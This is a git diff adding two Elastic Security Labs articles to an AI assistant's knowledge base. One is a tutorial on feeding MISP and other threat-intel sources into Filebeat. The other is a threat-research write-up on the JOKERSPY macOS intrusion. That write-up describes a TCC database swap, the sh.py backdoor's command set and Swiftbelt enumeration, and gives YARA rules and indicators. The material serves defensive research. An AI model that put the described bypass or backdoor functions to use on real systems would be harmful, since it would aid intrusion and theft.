+Status: Downloaded newer image for coolacid/misp-docker:core-latest
+Pulling misp-modules (coolacid/misp-docker:modules-latest)...
+modules-latest: Pulling from coolacid/misp-docker
+cdd040608d7b: Pull complete
+4e340668f524: Pull complete
+a4501f203bb2: Downloading [=========================================>         ]  166.1MB/201.3MB
+2cdaa3afcfca: Download complete
+99a18a4e84d6: Downloading [=============================>                     ]  130.8MB/218.3MB
+...
+
+```
+
+Once all of the containers are started, simply browse to [https://localhost](https://localhost:8080) and log in with the default credentials of admin@admin.test and a passphrase of admin. You will immediately be required to change your passphrase.
+
+### Configuring default MISP feeds
+
+Once you have started the MISP containers and changed your default credentials, hover over Sync Actions and then select List Feeds.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/misp-listfeeds.jpg)
+
+Highlight the available feeds, select “Enable selected” to enable the default feeds, and then “Fetch and store all feed data.”
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/misp-enablefeeds.jpg)
+
+Next, select on the “Event Actions” menu item, select “List Events” and you’ll see data begin to be populated. This will take a while.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/misp-listevents.jpg)
+
+While the data provided by the MISP threat feeds is being downloaded, let’s get your API key.
+
+### Collecting Your API Key
+
+To collect your API key, select “Administration” and then “List Users.” You will see your account. Next to your “Authkey” will be an eye icon, select it to show your API key and copy that down.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/misp-api.jpg)
+
+Now that we have set up and configured MISP and retrieved our API key, we can configure the actual Filebeat module.
+
+## Installing Filebeat
+
+Getting the Threat Intel module is no different than any other Filebeat module. Check out the [Quick Start guide to install Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html) either as a standalone binary or a package for macOS, Windows, or Linux.
+
+## Configuring the Threat Intel Filebeat module
+
+Once you have Filebeat, we’ll simply enable the module (ensure filebeat is in your $PATH).
+
+```
+Code Block 2 - Enabling the Threat Intel Filebeat Module
+
+filebeat modules enable threatintel
+```
+
+Next, let’s configure feeds. We’ll do this by modifying the module configuration files. Depending on your OS and installation method, the configuration files will be located in different locations:
+
+Windows
+
+- C:\Program Files\Filebeat\modules.d\threatintel.yml
+- If installed with [Chocolatey](https://community.chocolatey.org/packages/filebeat)
+- C:\ProgramData\chocolatey\lib\filebeat\tools\modules.d\threatintel.yml
+
+macOS
+
+- filebeat/modules.d/threatintel.yml
+- If installed with [Homebrew](https://formulae.brew.sh/formula/filebeat)
+- /usr/local/etc/filebeat/modules.d/threatintel.yml
+
+Linux
+
+- filebeat/modules.d/threatintel.yml
+- If Installed with [APT](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html#_apt) or [YUM / dnf](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html#_yum)
+- /etc/filebeat/modules.d/threatintel.yml
+
+Using whichever text editor you’re most comfortable with, open threatintel.yml and we’ll add your OTX API key, your MISP API key, and validate Anomali’s credential pair.
+
+### Abuse URL feed configuration
+
+By default, the Abuse URL feed is enabled and does not need modification. The feed includes domain, URI, and URL indicators with additional context for significant dates, tags, submitter, status, etc.
+
+```
+Code Block 3 - Configuring the Abuse URL Feed
+
+abuseurl:
+  enabled: true
+
+  # Input used for ingesting threat intel data.
+  var.input: httpjson
+
+  # The URL used for Threat Intel API calls.
+  var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/
+
+  # The interval to poll the API for updates.
+  var.interval: 10m
+```
+
+#### Abuse malware feed configuration
+
+By default, the Abuse malware feed is enabled and does not need modification. The feed includes file hashes and hosts with additional context for significant dates, tags, status, etc.
+
+```
+Code Block 4 - Configuring the Abuse Malware Feed
+
+abusemalware:
+    enabled: true
+
+    # Input used for ingesting threat intel data.
+    var.input: httpjson
+
+    # The URL used for Threat Intel API calls.
+    var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/
+
+    # The interval to poll the API for updates.
+    var.interval: 10m
+```
+
+### MISP feed configuration
+
+By default, the MISP feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, status, submitter, etc.
+
+The API endpoint that Filebeat will query needs to be configured. If you are running MISP on the same system as Filebeat, you can use var.url: https://localhost/event/restSearch. If you are running MISP elsewhere, you’ll need to enter that hostname or IP address in lieu of localhost.
+
+The API token is the “Authkey” that you retrieved during the previous MISP setup steps. You’ll enter that as the value for var.api_token:
+
+If you are using a self-signed SSL certificate for MISP, you’ll want to disable the SSL verification mode by uncommenting the var.ssl.verification_mode: none line.
+
+```
+Code Block 5 - Configuring the MISP Feed
+
+misp:
+    enabled: true
+
+    # Input used for ingesting threat intel data, defaults to JSON.
+    var.input: httpjson
+
+    # The URL of the MISP instance, should end with "/events/restSearch".
+    var.url: https://localhost/events/restSearch
+
+    # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI.
+    var.api_token: MISP-Authkey
+
+    # Configures the type of SSL verification done, if MISP is running on self signed certificates
+    # then the certificate would either need to be trusted, or verification_mode set to none.
+    var.ssl.verification_mode: none
+
+    # Optional filters that can be applied to the API for filtering out results. This should support the majority of
+    # fields in a MISP context. For examples please reference the filebeat module documentation.
+    #var.filters:
+    #  - threat_level: [4, 5]
+    #  - to_ids: true
+
+    # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request
+    # afterwards will filter on any event newer than the last event that was already ingested.
+    var.first_interval: 300h
+
+    # The interval to poll the API for updates.
+    var.interval: 5m
+```
+
+### AlienVault OTX feed configuration
+
+By default, the AlienVault OTX feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, etc.
+
+The API token is the “OTX Key” that you retrieved during the AlienVault OTX setup steps. You’ll enter that as the value for var.api_token:
+
+```
+Code Block 6 - Configuring the AlienVault OTX Feed
+
+otx:
+  enabled: true
+
+  # Input used for ingesting threat intel data
+  var.input: httpjson
+
+  # The URL used for OTX Threat Intel API calls.
+  var.url: https://otx.alienvault.com/api/v1/indicators/export
+
+  # The authentication token used to contact the OTX API, can be found on the OTX UI.
+  Var.api_token: OTX-Key
+
+  # Optional filters that can be applied to retrieve only specific indicators.
+  #var.types: "domain,IPv4,hostname,url,FileHash-SHA256"
+
+  # The timeout of the HTTP client connecting to the OTX API
+  #var.http_client_timeout: 120s
+
+  # How many hours to look back for each request, should be close to the configured interval.
+  # Deduplication of events is handled by the module.
+  var.lookback_range: 1h
+
+  # How far back to look once the beat starts up for the first time, the value has to be in hours.
+  var.first_interval: 400h
+
+  # The interval to poll the API for updates
+  var.interval: 5m
+```
+
+### Anomali feed configuration
+
+By default, the Anomali feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, etc.
+
+The default username and passphrase for the Limo feed is guest:guest, but are commented out. If you do not have other credential pairs, you can simply uncomment var.username and var.password.
+
+At the time of this writing, Anomali has 11 collections that they provide as part of their Limo feed. The var.url variable is where the collection is defined. To get a list of the collections, you can query the Anomali Limo collections API endpoint (while not required, [jq](https://stedolan.github.io/jq/download/) makes the collections easier to read).
+
+```
+Code Block 7 - Configuring the Anomali Limo Collections
+
+$ curl -L -u guest:guest https://limo.anomali.com/api/v1/taxii2/feeds/collections | jq
+
+{
+  "collections": [
+    {
+      "can_read": true,
+      "can_write": false,
+      "description": "",
+      "id": "107",
+      "title": "Phish Tank"
+    },
+    {
+      "can_read": true,
+      "can_write": false,
+      "description": "",
+      "id": "135",
+      "title": "Abuse.ch Ransomware IPs"
+    },
+    {
+      "can_read": true,
+      "can_write": false,
+      "description": "",
+      "id": "136",
+      "title": "Abuse.ch Ransomware Domains"
+    },
+...
+```
+
+The collection ID can be inserted into the Anomali configuration. There are a few ways to do this. You can:
+
+- Manually change the ID
+- Enter all of the IDs and comment out all but the collection you’re wanting to target
+- Create a duplicate Anomali configuration section for each collection
+
+The below example shows the approach of duplicate sections for each collection; notice the different collection ID for each section (31, 313, 33) in the var.url: field.
+
+```
+Code Block 8 - Configuring the Anomali Limo Feed
+
+  anomali:
+    enabled: true
+
+    # Input used for ingesting threat intel data
+    var.input: httpjson
+
+    # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URL's depending
+    # on the type of threat intel source that is needed.
+    var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/31/objects
+
+    # The Username used by anomali Limo, defaults to guest.
+    var.username: guest
+
+    # The password used by anomali Limo, defaults to guest.
+    var.password: guest
+
+    # How far back to look once the beat starts up for the first time, the value has to be in hours.
+    var.first_interval: 400h
+
+    # The interval to poll the API for updates
+    var.interval: 5m
+
+  anomali:
+    enabled: true
+
+    # Input used for ingesting threat intel data
+    var.input: httpjson
+
+    # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URL's depending
+    # on the type of threat intel source that is needed.
+    var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/313/objects
+
+    # The Username used by anomali Limo, defaults to guest.
+    var.username: guest
+
+    # The password used by anomali Limo, defaults to guest.
+    var.password: guest
+
+    # How far back to look once the beat starts up for the first time, the value has to be in hours.
+    var.first_interval: 400h
+
+    # The interval to poll the API for updates
+    var.interval: 5m
+
+  anomali:
+    enabled: true
+
+    # Input used for ingesting threat intel data
+    var.input: httpjson
+
+    # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URL's depending
+    # on the type of threat intel source that is needed.
+    var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/33/objects
+...
+
+```
+
+Now that we’ve configured the module to consume threat feed data, let’s send the data into Elasticsearch and visualize it with Kibana.
+
+## Setting up Elasticsearch and Kibana
+
+The Filebeat Threat Intel module will send the configured threat feed data into Elasticsearch, which can be visualized with Kibana. Please see the Elastic documentation for setting up [Elasticsearch](https://www.elastic.co/guide/en/elasticsearch/reference/current/setup.html) and [Kibana](https://www.elastic.co/guide/en/kibana/current/setup.html) production environments. Additionally, if you’re looking for a turnkey approach, you can quickly and securely set up an [Elastic Cloud](https://cloud.elastic.co) account.
+
+For this non-production example, we’ll be using one of the many projects that use Docker to get Elasticsearch and Kibana up and running quickly.
+
+### Standing up an Elasticsearch and Kibana container
+
+As a caveat, this will cover a convenient default development deployment of Elasticsearch and Kibana. It should not be used in production. Please see the [Elastic documentation](https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-stack-security.html) for properly deploying a secure instance.
+
+We’ll simply collect the repository and start the Docker containers.
+
+- git clone: This copies the remote repository to your local machine into a folder called “elastic-container”
+- cd elastic-container: Changes into the “elastic-container” directory
+- sh elastic-container.sh start: This downloads and starts the Elasticsearch and Kibana containers
+
+```
+Code Block 9 - Starting Elastic Containers
+
+$ git clone https://github.com/peasead/elastic-container.git
+$ cd elastic-container
+$ sh elastic-container.sh start
+
+7.12.1: Pulling from elasticsearch/elasticsearch
+ddf49b9115d7: Already exists
+4df4d6995ad2: Pull complete
+e180ce5d1430: Pull complete
+b3801a448e4f: Downloading [====>                      ]  199.3MB/353.1MB
+a3100bfb487c: Download complete
+817ce7c869c7: Download complete
+485f138f2280: Download complete
+
+7.12.1: Pulling from kibana/kibana
+ddf49b9115d7: Already exists
+588c50b1b6af: Extracting [====================>       ]  34.93MB/40.52MB
+9d32826b6fa0: Download complete
+01017880c9d9: Download complete
+efcedd43b7be: Download complete
+0887ad2a14e0: Download complete
+625b277c1f7b: Downloading [=====>                     ]  52.27MB/320.4MB
+68815bc8856d: Download complete
+e9e0d8f8fa8c: Download complete
+```
+
+Check out the repository [documentation](https://github.com/peasead/elastic-container) for additional usage and configuration options (if needed).
+
+Once all of the containers are started, simply browse to [http://localhost:5601](https://localhost:5601) and log in with the default credentials of elastic and a passphrase of password.
+
+## Consuming threat data with Filebeat
+
+There are multiple [output options for Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/configuring-output.html), so use whatever is easiest for you. We’ll use a local Elasticsearch instance in this example. Using a local instance of Elasticsearch and Kibana requires no modification to the filebeat.yml file.
+
+To validate our configuration, let’s first test our configuration and access to Elasticsearch.
+
+- filebeat test config: This will test to ensure your filebeat.yml configuration is correct (if you modified it to fit your environment)
+- filebeat test output - this will test to ensure you can access Elasticsearch
+
+```
+Code Block 10 - Testing Filebeat Configuration and Connection
+
+$ filebeat test config
+Config OK
+
+$ filebeat test output
+elasticsearch: http://localhost:9200...
+  parse url... OK
+  connection...
+    parse host... OK
+    dns lookup... OK
+    addresses: ::1, 127.0.0.1
+    dial up... OK
+  TLS... WARN secure connection disabled
+  talk to server... OK
+  version: 7.12.0
+```
+
+To load the dashboards, index pattern, and ingest pipelines, let’s run the setup.
+
+- filebeat setup: This will connect to Kibana and load the index pattern, ingest pipelines, and the saved objects (tags, visualizations, and dashboards)
+
+```
+Code Block 11 - Setting Up Filebeat Index Patterns and saved objects in Kibana
+
+$ filebeat setup
+
+Overwriting ILM policy is disabled. Set `setup.ilm.overwrite: true` for enabling.
+
+Index setup finished.
+Loading dashboards (Kibana must be running and reachable)
+Loaded dashboards
+Setting up ML using setup --machine-learning is going to be removed in 8.0.0. Please use the ML app instead.
+See more: https://www.elastic.co/guide/en/machine-learning/current/index.html
+Loaded machine learning job configurations
+Loaded Ingest pipelines
+
+```
+
+Finally, let’s [start Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-starting.html) to begin collecting!
+
+Next, browse to Kibana and select the Dashboards app. To make the dashboards easier to find, they all use the “threat intel” tag.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/filebeat-dashboards.jpg)
+
+There is a dashboard for each feed and an overview dashboard that shows the health of the module.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/overview.jpg
+
+It may take several minutes for all of the data to be retrieved as the different sources are polled.
+
+## What’s next?
+
+We’re working on converting the existing visualizations into [Lens](https://www.elastic.co/kibana/kibana-lens) and adding [drilldown](https://www.elastic.co/guide/en/kibana/current/drilldowns.html) capabilities to each visualization.
+
+Additionally, as we mentioned in the beginning of this post, this is part one of a three-part series on operationalizing threat data in the Elastic Stack. The next post will cover enhancements to the Threat ECS fieldset and enriching threat data using local endpoint and network observations.
+
+We’re working on adding additional open source and commercial feeds. If you have feeds that you’d like to see prioritized, please check out the contribution section below.
+
+Finally, we’re looking at opportunities to add context and enrichments to observed events with third-party sources.
+
+So stay tuned — we’re continuing to lean hard into empowering our customers to defend their environments. Being able to action threat data is a key part of that journey.
+
+## How can you contribute?
+
+The [Threat Intel Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html) was released with Elastic 7.12, which means that it is still in beta. Testing the feeds, configurations, visualizations, etc. is strongly encouraged. We love hearing feedback.
+
+In addition to the Threat Intel module, there are some other repositories that are related to the collection, processing, and analysis of TI data:
+
+- The Beats [repository](https://github.com/elastic/beats), where you can contribute to, and enhance, threat data feeds
+- The Elastic Common Schema (ECS) [repository](https://github.com/elastic/ecs), where you can be a part of the discussion on shaping how threat data is described in the Elastic Stack
+- The Kibana [repository](https://github.com/elastic/kibana), where analysts interact with the data stored in Elasticsearch
+- The Detection Rules [repository](https://github.com/elastic/detection-rules), where detection logic and rules are created and stored
+
+The best way to contribute to the community is to explore the functionality, features, and [documentation](https://www.elastic.co/guide/en/beats/filebeat/7.12/filebeat-module-threatintel.html) and let us know through a [Github Issue](https://github.com/elastic/beats/issues/new/choose) if there is a problem or something you’d like to see.
+
+If you’re new to Elastic, experience our latest version of the [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud. Also be sure to take advantage of our [Quick Start training](https://www.elastic.co/training/elastic-security-quick-start) to set yourself up for success.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/inital_research_of_jokerspy.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/inital_research_of_jokerspy.md
new file mode 100644
index 0000000000000..4adcfcecaa03a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/inital_research_of_jokerspy.md
@@ -0,0 +1,269 @@
+---
+title: "Initial research exposing JOKERSPY"
+slug: "inital-research-of-jokerspy"
+date: "2023-06-21"
+subtitle: "An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan."
+description: "Explore JOKERSPY, a recently discovered campaign that targets financial institutions with Python backdoors. This article covers reconnaissance, attack patterns, and methods of identifying JOKERSPY in your network."
+author:
+  - slug: colson-wilhoit
+  - slug: salim-bitam
+  - slug: seth-goodwin
+  - slug: andrew-pease
+  - slug: ricardo-ungureanu
+image: "photo-edited-04@2x.jpg"
+category:
+  - slug: attack-pattern
+  - slug: campaigns
+tags:
+  - ref9134
+  - jokerspy
+  - cryptocurrency
+  - defi
+  - swiftbelt
+---
+
+## Key takeaways
+
+- This is an initial notification of an active intrusion with additional details to follow
+- REF9134 leverages custom and open source tools for reconnaissance and command and control
+- Targets of this activity include a cryptocurrency exchange in Japan
+
+## Preamble
+
+This research article explores a recently discovered intrusion we’re calling REF9134, which involves using the **sh.py** backdoor to deploy the macOS Swiftbelt enumeration tool. **sh.py** and **xcc** have recently been dubbed [JOKERSPY](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/) by Bitdefender.
+
+Specifically, this research covers:
+
+- How Elastic Security Labs identified reconnaissance from the adversary group
+- The adversary’s steps to evade detection using **xcc** , installing the **sh.py** backdoor, and deploying enumeration tools
+
+A deeper look at this attack may be published at a later date.
+
+## Overview
+
+In late May of 2023, an adversary with existing access in a prominent Japanese cryptocurrency exchange tripped one of our diagnostic endpoint alerts that detected the execution of a binary ( **xcc** ). **xcc** is not trusted by Apple, and the adversary self-signed using the native macOS tool **codesign**. While this detection in itself was not necessarily innocuous, the industry vertical and additional activity we observed following these initial alerts caught our eye and caused us to pay closer attention.
+
+Following the execution of **xcc** , we observed the threat actor attempting to bypass TCC permissions by creating their own TCC database and trying to replace the existing one. On June 1st a new Python-based tool was seen executing from the same directory as **xcc** and was utilized to execute an open-source macOS post-exploitation enumeration tool known as Swiftbelt.
+
+## Analysis
+
+REF9134 is an intrusion into a large Japan-based cryptocurrency service provider focusing on asset exchange for trading Bitcoin, Ethereum, and other common cryptocurrencies.
+
+### The xcc binary
+
+**xcc** ( **d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8** ) is a self-signed multi-architecture binary written in Swift which is used to evaluate current system permissions. The version observed by Elastic Security Labs is signed as **XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4** , and has a code signature resembling [publicly known](https://objective-see.org/blog/blog_0x73.html) and untrusted payloads.
+
+![Initial detection of the xcc binary](/assets/images/inital-research-of-jokerspy/image8.png)
+
+To identify other binaries signed with the same identifier, we converted **XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4** to hexadecimal and searched VirusTotal to identify 3 additional samples ( **content:\{5850726f74656374436865636b2d35353535343934346637343039366138333662373333313062643535643937643164666635636434\}** ).
+
+Each contained the same core functionality with structural differences. These discrepancies may indicate that these variants of **xcc** were developed to bypass endpoint capabilities that interfered with execution.
+
+Shortly after the creation of **xcc** , researchers observed the threat actor copying **/Users/Shared/tcc.db** over the existing TCC database, **/Library/Application Support/com.apple.TCC/TCC.db**. This may enable the threat to avoid TCC prompts visible to system users while simultaneously abusing a directory with broad file write permissions.
+
+#### XCode artifacts
+
+During analysis of this binary, researchers identified two unique paths, **/Users/joker/Developer/Xcode/DerivedData/** and **/Users/joker/Downloads/Spy/XProtectCheck/XProtectCheck/** , which stood out as anomalous. The default path for compiling code with Xcode is **/Users/[username]/Developer/Xcode/DerivedData**.
+
+#### Abusing TCC
+
+These introspection permissions are managed by the native Transparency, Consent, and Control (TCC) feature. Researchers determined that **xcc** checks FullDiskAccess and ScreenRecording permissions, as well as checking if the screen is currently locked and if the current process is a trusted accessibility client.
+
+![xcc queries current system permissions](/assets/images/inital-research-of-jokerspy/image2.jpg)
+
+Upon successfully executing in our [Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) environment, the following results were displayed:
+
+![TCC permissions queried by xcc](/assets/images/inital-research-of-jokerspy/image3.jpg)
+
+Once the custom TCC database was placed in the expected location, the threat actor executed the **xcc** binary.
+
+![Threat actor creating/modifying, moving a TCC database, and then executing xcc](/assets/images/inital-research-of-jokerspy/image4.jpg)
+
+#### Initial access
+
+The **xcc** binary was executed via bash by three separate processes
+
+- **/Applications/IntelliJ IDEA.app/Contents/MacOS/idea**
+- **/Applications/iTerm.app/Contents/MacOS/iTerm2**
+- **/Applications/Visual Studio Code.app/Contents/MacOS/Electron.**
+
+While we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or 3rd party dependency that provided the threat actor access. This aligns with the connection that was made by the researchers at [Bitdefender](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/) who correlated the hardcoded domain found in a version of the **sh.py** backdoor to a Tweet about an infected macOS QR code reader which was found to have a malicious dependency.
+
+#### Deployed cryptographic libraries
+
+On May 31st, researchers observed three non-native [DyLibs](https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/UsingDynamicLibraries.html) deployed to **/Users/shared/keybag/** called **libcrypto.1.0.0.dylib** , **libncursesw.5.dylib** , and **libssl.1.0.0.dylib**. On MacOS, keys for file and keychain Data Protection are stored in [keybags](https://support.apple.com/en-au/guide/security/sec6483d5760/web), and pertain to iOS, iPadOS, watchOS, and tvOS. At this time, researchers propose that this staging serves a defense evasion purpose and speculate that they may contain useful vulnerabilities. The threat actor may plan to introduce these vulnerabilities to otherwise patched systems or applications.
+
+#### The sh.py backdoor
+
+**sh.py** is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt **.**
+
+The malware loads its configuration from **~/Public/Safari/sar.dat**. The configuration file contains crucial elements such as command-and-control (C2) URLs, a sleep timer for beaconing purposes (the default value is 5 seconds), and a unique nine-digit identifier assigned to each agent.
+
+![Execution of sh.py with the C2 URL provided as a parameter](/assets/images/inital-research-of-jokerspy/image5.jpg)
+
+As part of its periodic beaconing, the malware gathers and transmits various system information. The information sent includes:
+
+- Hostname
+- Username
+- Domain name
+- Current directory
+- The absolute path of the executable binary
+- OS version
+- Is 64-bit OS
+- Is 64-bit process
+- Python version
+
+Below is a table outlining the various commands that can be handled by the backdoor:
+
+| Command | Description                                                                           |
+| ------- | ------------------------------------------------------------------------------------- |
+| sk      | Stop the backdoor's execution                                                         |
+| l       | List the files of the path provided as parameter                                      |
+| c       | Execute and return the output of a shell command                                      |
+| cd      | Change directory and return the new path                                              |
+| xs      | Execute a Python code given as a parameter in the current context                     |
+| xsi     | Decode a Base64-encoded Python code given as a parameter, compile it, then execute it |
+| r       | Remove a file or directory from the system                                            |
+| e       | Execute a file from the system with or without parameter                              |
+| u       | Upload a file to the infected system                                                  |
+| d       | Download a file from the infected system                                              |
+| g       | Get the current malware's configuration stored in the configuration file              |
+| w       | Override the malware's configuration file with new values                             |
+
+### Swiftbelt
+
+On June 1st, the compromised system registered a signature alert for [MacOS.Hacktool.Swiftbelt](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Hacktool_Swiftbelt.yar), a MacOS enumeration capability inspired by [SeatBelt](https://github.com/GhostPack/Seatbelt) and created by the red-teamer Cedric Owens. Unlike other enumeration methods, Swiftbelt invokes Swift code to avoid creating command line artifacts. Notably, **xcc** variants are also written using Swift.
+
+The signature alert indicated that Swiftbelt was written to **/Users/shared/sb** and executed using the bash shell interpreter, **sh**. The full command line observed by researchers was **Users/Shared/sb /bin/sh -c /users/shared/sb \\> /users/shared/sb.log 2\\>&1** , demonstrating that the threat actor captured results in **sb.log** while errors were directed to STDOUT.
+
+## Diamond Model
+
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.
+
+![REF9134 Diamond Model](/assets/images/inital-research-of-jokerspy/image1.png)
+
+## Observed tactics and techniques
+
+### MITRE ATT&CK Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action. These are the tactics observed by Elastic Security Labs in this campaign:
+
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)
+- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)
+- [Discovery](https://attack.mitre.org/tactics/TA0007)
+
+### MITRE ATT&CK Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action. These are the techniques observed by Elastic Security Labs in this campaign:
+
+- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
+- [Dylib Hijacking](https://attack.mitre.org/techniques/T1574/004)
+- [Potential Exploitation for Privilege Execution](https://attack.mitre.org/techniques/T1068)
+- [Potential Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548)
+- [Hide Artifacts](https://attack.mitre.org/techniques/T1564)
+- [Masquerading](https://attack.mitre.org/techniques/T1036)
+- [Obfuscating Files or Information](https://attack.mitre.org/techniques/T1027)
+- [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553)
+- [Application Window Discovery](https://attack.mitre.org/techniques/T1010)
+- [Screen Capture](https://attack.mitre.org/techniques/T1113)
+- [Crytpoistic Software](https://attack.mitre.org/software/S0498)
+- [Data from Local System](https://attack.mitre.org/techniques/T1005)
+
+## Detection logic
+
+### Prevention
+
+- [Non-Native Dylib Extracted into Suspicious Directory](https://github.com/elastic/endpoint-rules/blob/1006a4d9a3d95e35149a3640fadf68a32c02afa9/rules/execution_dylib_extracted_to_new_directory.toml#L10)
+- [Potential Privilege Escalation via TCC bypass with fake TCC.db](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_tcc_bypass_with_fake_tcc.db.toml)
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the JOKERSPY backdoor and SwiftBelt tool.
+
+```
+rule Macos_Hacktool_JokerSpy {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-06-19"
+        last_modified = "2023-06-19"
+        os = "MacOS"
+        arch = "x86"
+        category_type = "Hacktool"
+        family = "JokerSpy"
+        threat_name = "Macos.Hacktool.JokerSpy"
+        reference_sample = "d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8"
+        license = "Elastic License v2"
+
+    strings:
+        $str1 = "ScreenRecording: NO" fullword
+        $str2 = "Accessibility: NO" fullword
+        $str3 = "Accessibility: YES" fullword
+        $str4 = "eck13XProtectCheck"
+        $str5 = "Accessibility: NO" fullword
+        $str6 = "kMDItemDisplayName = *TCC.db" fullword
+    condition:
+        5 of them
+}
+```
+
+```
+rule MacOS_Hacktool_Swiftbelt {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2021-10-12"
+        last_modified = "2021-10-25"
+        threat_name = "MacOS.Hacktool.Swiftbelt"
+        reference_sample = "452c832a17436f61ad5f32ee1c97db05575160105ed1dcd0d3c6db9fb5a9aea1"
+        os = "macos"
+        arch_context = "x86"
+        license = "Elastic License v2"
+
+    strings:
+        $dbg1 = "SwiftBelt/Sources/SwiftBelt"
+        $dbg2 = "[-] Firefox places.sqlite database not found for user"
+        $dbg3 = "[-] No security products found"
+        $dbg4 = "SSH/AWS/gcloud Credentials Search:"
+        $dbg5 = "[-] Could not open the Slack Cookies database"
+        $sec1 = "[+] Malwarebytes A/V found on this host"
+        $sec2 = "[+] Cisco AMP for endpoints found"
+        $sec3 = "[+] SentinelOne agent running"
+        $sec4 = "[+] Crowdstrike Falcon agent found"
+        $sec5 = "[+] FireEye HX agent installed"
+        $sec6 = "[+] Little snitch firewall found"
+        $sec7 = "[+] ESET A/V installed"
+        $sec8 = "[+] Carbon Black OSX Sensor installed"
+        $sec9 = "/Library/Little Snitch"
+        $sec10 = "/Library/FireEye/xagt"
+        $sec11 = "/Library/CS/falcond"
+        $sec12 = "/Library/Logs/PaloAltoNetworks/GlobalProtect"
+        $sec13 = "/Library/Application Support/Malwarebytes"
+        $sec14 = "/usr/local/bin/osqueryi"
+        $sec15 = "/Library/Sophos Anti-Virus"
+        $sec16 = "/Library/Objective-See/Lulu"
+        $sec17 = "com.eset.remoteadministrator.agent"
+        $sec18 = "/Applications/CarbonBlack/CbOsxSensorService"
+        $sec19 = "/Applications/BlockBlock Helper.app"
+        $sec20 = "/Applications/KextViewr.app"
+    condition:
+        6 of them
+}
+```
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/)
+
+## Observations
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type    | Name                | Reference                |
+| ---------------------------------------------------------------- | ------- | ------------------- | ------------------------ |
+| app.influmarket[.]org                                            | Domain  | n/a                 | sh.py domain             |
+| d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8 | SHA-256 | /Users/Shared/xcc   | Macos.Hacktool.JokerSpy  |
+| 8ca86f78f0c73a46f31be366538423ea0ec58089f3880e041543d08ce11fa626 | SHA-256 | /Users/Shared/sb    | MacOS.Hacktool.Swiftbelt |
+| aa951c053baf011d08f3a60a10c1d09bbac32f332413db5b38b8737558a08dc1 | SHA-256 | /Users/Shared/sh.py | sh.py script             |
